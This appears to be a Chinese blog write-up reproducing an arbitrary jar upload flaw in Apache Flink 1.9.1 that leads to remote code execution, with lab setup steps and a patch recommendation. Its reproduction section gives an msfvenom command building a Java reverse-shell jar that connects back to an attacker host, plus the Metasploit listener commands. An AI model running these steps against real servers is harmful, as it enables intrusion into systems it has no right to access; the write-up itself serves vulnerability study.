Apache Flink 任意 Jar 包上传致 RCE 漏洞

2020-12-03  本文已影响0人  5f4120c4213b

0x00简介

Apache Flink是近几年大火的数据处理引擎。受到各大厂商的推崇并且已经应用<typo id="typo-50" data-origin="与" ignoretag="true">与</typo>实际的业务场景中。很多公司在进行选型的时候都会选择Apache Flink作为选型的对象。Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。

image

0x01漏洞概述

攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的

0x02影响范围

到目前Apache Flink 1.9.1版本

0x03环境搭建

攻击机:kali

受害机:ubuntu16

1. 安装java8环境,自行百度教程

image

2. 下载Flink1.9.1版本,然后解压安装包

Flink下载地址:https://archive.apache.org/dist/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

解压 tar -zxvf

image

3. 进入bin目录运行./start-cluster.sh启动环境

image

4.在浏览器打开,出现以下界面表示安装成功

image

0x04漏洞复现

1. 首先使用kali生成jar的后门包

msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=port -f jar > shell.jar

image

2.使用msfconsole监听shell设置的端口

use exploit/multi/handler

set payload java/shell/reverse_tcp

image image

3.run开启监听

image

4.把制作好的shell.jar包访问目标站点并上传shell.jar

image

5.点击Submit触发漏洞,反弹回了shell

image

0x05修复建议

更新官方补丁或更新最新版本

上一篇 下一篇

猜你喜欢

热点阅读